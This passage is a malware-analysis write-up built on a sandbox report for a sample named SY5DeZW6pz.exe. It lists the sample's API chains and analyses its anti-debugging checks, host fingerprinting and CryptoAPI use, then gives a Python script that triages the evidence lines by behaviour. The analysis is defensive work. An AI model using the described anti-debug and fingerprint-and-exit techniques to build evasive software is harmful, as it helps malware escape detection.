Source: Amcache.hve.1.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.1.dr Binary or memory string: VMware, Inc.me
Source: Amcache.hve.1.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.1.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.18227214.B64.2106252220,BiosReleaseDate:06/25/2021,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.1.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F398150 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree, 0_2_0F398150
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F395210 lstrlenA,VirtualAlloc,CryptStringToBinaryA,_memset,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrcpyA,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,VirtualFree,GetLastError, 0_2_0F395210
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F3A6044 mov eax, dword ptr fs:[00000030h] 0_2_0F3A6044
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F395EC0 mov eax, dword ptr fs:[00000030h] 0_2_0F395EC0
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F393AA0 AllocateAndInitializeSid,GetModuleHandleA,GetProcAddress,FreeSid, 0_2_0F393AA0
Source: SciTE.exe.1.dr Binary or memory string: GShift+Alt+KeypadPlusMinusDecimalDivideMultiplyLeftRightUpDownInsertEndEnterSpaceEscapeWinMenuPLAT_WINPLAT_WINNTPropertiesEmbeddedtoolbar.largeACCELSSciTESciTEWindowSciTEWindowContentlatin1latin2big5gbkshift_jiseuc-krcyrilliciso-8859-5iso8859-111250windows-1251translation.encodingSciTE_HOMESciTE_USERHOMEUSERPROFILEHHCTRL.OCXHtmlHelpWRich Text FormatShell_TrayWndButtonfull.screen.hides.menuEditcmd.exe /c
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F3990A0 cpuid 0_2_0F3990A0
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Code function: 1_2_00C21718 GetSystemTimeAsFileTime,SHSetValueA,SHGetValueA,__aulldiv,__aulldiv, 1_2_00C21718
Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Code function: 1_2_00C2139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId, 1_2_00C2139F
Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F397330 VirtualAlloc,VirtualAlloc,GetUserNameW,VirtualAlloc,GetComputerNameW,wsprintfW,VirtualAlloc,wsprintfW,VirtualAlloc,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,VirtualFree,VirtualAlloc,VirtualAlloc,wsprintfW,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,lstrcmpiW,wsprintfW,VirtualFree,VirtualAlloc,VirtualAlloc,wsprintfW,GetNativeSystemInfo,VirtualAlloc,wsprintfW,ExitProcess,wsprintfW,VirtualAlloc,VirtualAlloc,GetWindowsDirectoryW,GetVolumeInformationW,lstrlenW,wsprintfW,lstrcatW,lstrcatW,GetModuleHandleW,GetProcAddress,lstrlenW,VirtualFree,lstrcatW,VirtualAlloc,GetDriveTypeW,lstrcatW,lstrcatW,lstrcatW,GetDiskFreeSpaceW,lstrlenW,wsprintfW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,VirtualFree, 0_2_0F397330
Source: Amcache.hve.1.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
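The evidence lines above are raw sandbox output, and the first triage step is to sort them by behaviour and by who is responsible for them. Two points matter here. First, `mov eax, dword ptr fs:[00000030h]` reads the PEB pointer from the 32-bit TEB, which is the usual prelude to testing `PEB.BeingDebugged` or `NtGlobalFlag`, and together with the `DebugPort` queries (`NtQueryInformationProcess` with `ProcessDebugPort`) it is the sample's own anti-debugging. Second, the `Amcache.hve.1.dr` strings (VMware BIOS and disk identifiers, the Hyper-V generation counter, the Windows Defender path) come from the analysis host's own Amcache hive, which the sandbox collected; they describe the VM the sample ran in and must not be written up as anti-VM logic inside the sample. The script below is an added example for this page, not part of the report or of the sandbox's tooling; its rule table, category names and `Finding` type are assumptions of the example, and its input is a handful of lines copied from this section (the long fingerprinting chain at `0_2_0F397330` shortened to its distinctive APIs).

```python
"""Triage helper for the 'Source: ...' evidence lines of a sandbox report.

Added example for this page; it is not part of the report or of the sandbox's
tooling. The rule table, the category names and the Finding type are this
example's own assumptions.
"""
import re
from collections import Counter
from dataclasses import dataclass

# Evidence lines copied from this section of the report (the fingerprinting chain
# at 0_2_0F397330 is shortened to its distinctive APIs). Some text exports keep the
# report's "Jump to behavior" link text at the end of a line; the parser drops it.
# The two Amcache lines are included on purpose: Amcache.hve is the sandbox host's
# own hive, so its VMware / Defender strings describe the analysis VM, not the sample.
SAMPLE_LINES = [
    r"Source: Amcache.hve.1.dr Binary or memory string: VMware Virtual disk SCSI Disk Device",
    r"Source: Amcache.hve.1.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe",
    r"Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F398150 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree, 0_2_0F398150",
    r"Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F3A6044 mov eax, dword ptr fs:[00000030h] 0_2_0F3A6044",
    r"Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F395EC0 mov eax, dword ptr fs:[00000030h] 0_2_0F395EC0",
    r"Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Process queried: DebugPort Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Process queried: DebugPort Jump to behavior",
    r"Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F393AA0 AllocateAndInitializeSid,GetModuleHandleA,GetProcAddress,FreeSid, 0_2_0F393AA0",
    r"Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F3990A0 cpuid 0_2_0F3990A0",
    r"Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior",
    r"Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid",
    r"Source: C:\Users\user\AppData\Local\Temp\vSQshX.exe Code function: 1_2_00C21718 GetSystemTimeAsFileTime,SHSetValueA,SHGetValueA,__aulldiv,__aulldiv, 1_2_00C21718",
    r"Source: C:\Users\user\Desktop\SY5DeZW6pz.exe Code function: 0_2_0F397330 VirtualAlloc,GetUserNameW,GetComputerNameW,RegOpenKeyExW,RegQueryValueExW,lstrcmpiW,ExitProcess,GetNativeSystemInfo,GetWindowsDirectoryW,GetVolumeInformationW,GetModuleHandleW,GetProcAddress,GetDriveTypeW,GetDiskFreeSpaceW, 0_2_0F397330",
]

# "Source: <path-or-artifact> <evidence kind>: <detail>", optional link text at the end.
LINE_RE = re.compile(r"^Source:\s+(?P<source>\S+)\s+(?P<kind>[^:]+?):\s*"
                     r"(?P<detail>.*?)(?:\s+Jump to behavior)?$")
# 'Code function' details are wrapped in the function address: "0_2_0F398150 API,API, 0_2_0F398150".
FUNC_RE = re.compile(r"^(?P<addr>\d+_\d+_[0-9A-Fa-f]+)\s+(?P<body>.*?),?\s*(?P=addr)$")
VM_RE = re.compile(r"VMware|VirtualBox|VBox|QEMU|Hyper-V|Xen", re.I)

# (pattern, category, note). Categories are this example's own labels.
RULES = [
    (re.compile(r"fs:\[0*30h\]"), "anti-debug",
     "reads the PEB pointer from the 32-bit TEB (fs:[0x30]); usually followed by a BeingDebugged / NtGlobalFlag test"),
    (re.compile(r"^DebugPort\b"), "anti-debug",
     "NtQueryInformationProcess(ProcessDebugPort)"),
    (re.compile(r"\bcpuid\b"), "fingerprint",
     "CPUID (vendor/brand strings; leaf 1 ECX bit 31 also flags a hypervisor)"),
    (re.compile(r"CentralProcessor|MachineGuid"), "fingerprint",
     "host identity from the registry (CPU description, per-machine GUID)"),
    (re.compile(r"GetUserNameW|GetComputerNameW|GetVolumeInformationW|GetNativeSystemInfo|GetDiskFreeSpaceW"),
     "fingerprint", "user / host name and volume inventory"),
    (re.compile(r"GetSystemTimeAsFileTime|GetSystemTime\b|GetLocalTime"), "time-check",
     "reads the clock; compare with the report's date-check signature"),
    (re.compile(r"CryptAcquireContext|CryptStringToBinary|CryptGenRandom"), "crypto-api",
     "CryptoAPI use (key material or a base64-encoded blob)"),
    (re.compile(r"LookupPrivilegeValue|AllocateAndInitializeSid"), "privilege",
     "privilege / SID handling, often an administrator check"),
    (re.compile(r"GetProcAddress"), "dynamic-import",
     "resolves APIs at run time, so the import table understates what the code calls"),
]


@dataclass
class Finding:
    source: str
    kind: str
    category: str
    note: str
    detail: str


def parse_line(line):
    """Split one report line into (source, kind, detail); None if it is not an evidence line."""
    m = LINE_RE.match(line.strip())
    return (m.group("source"), m.group("kind"), m.group("detail")) if m else None


def api_chain(detail):
    """Return the API list of a 'Code function' detail, or the raw instruction as a single item."""
    m = FUNC_RE.match(detail)
    body = m.group("body") if m else detail
    if " " in body:                      # an instruction such as "mov eax, dword ptr fs:[00000030h]"
        return [body]
    return [api for api in body.split(",") if api]


def classify(source, kind, detail):
    """Map one evidence line to zero or more categories, attributing host artifacts correctly."""
    if source.startswith("Amcache.hve"):
        return [Finding(source, kind, "host-artifact",
                        "Amcache.hve is the sandbox host's own hive: this describes the analysis VM, not the sample",
                        detail)]
    if kind == "Binary or memory string":
        if VM_RE.search(detail):
            return [Finding(source, kind, "anti-vm-string", "hypervisor vendor string in the sample or a dropped file", detail)]
        return []
    return [Finding(source, kind, cat, note, detail) for rx, cat, note in RULES if rx.search(detail)]


def triage(lines):
    findings = []
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            findings.extend(classify(*parsed))
    return findings


def category_counts(findings):
    return Counter(f.category for f in findings)


def sample_behaviours(findings):
    """Categories attributable to the sample itself (host artifacts excluded)."""
    return sorted({f.category for f in findings if f.category != "host-artifact"})


if __name__ == "__main__":
    found = triage(SAMPLE_LINES)
    for category, n in sorted(category_counts(found).items()):
        print(f"{category:15} {n}")
    print("sample behaviours:", ", ".join(sample_behaviours(found)))
```

Run stand-alone, it prints the per-category counts and the list of behaviours that belong to the sample; the two `host-artifact` findings are kept visible but excluded from that list, which is the separation a write-up of this report needs. The chain at `0_2_0F397330` deserves a second look in the disassembly rather than a rule hit: a registry value is read and compared case-insensitively (`RegQueryValueExW`, `lstrcmpiW`) with `ExitProcess` reachable from the same function, which is the shape of a fingerprint-and-bail check, although the line alone does not say which value is compared.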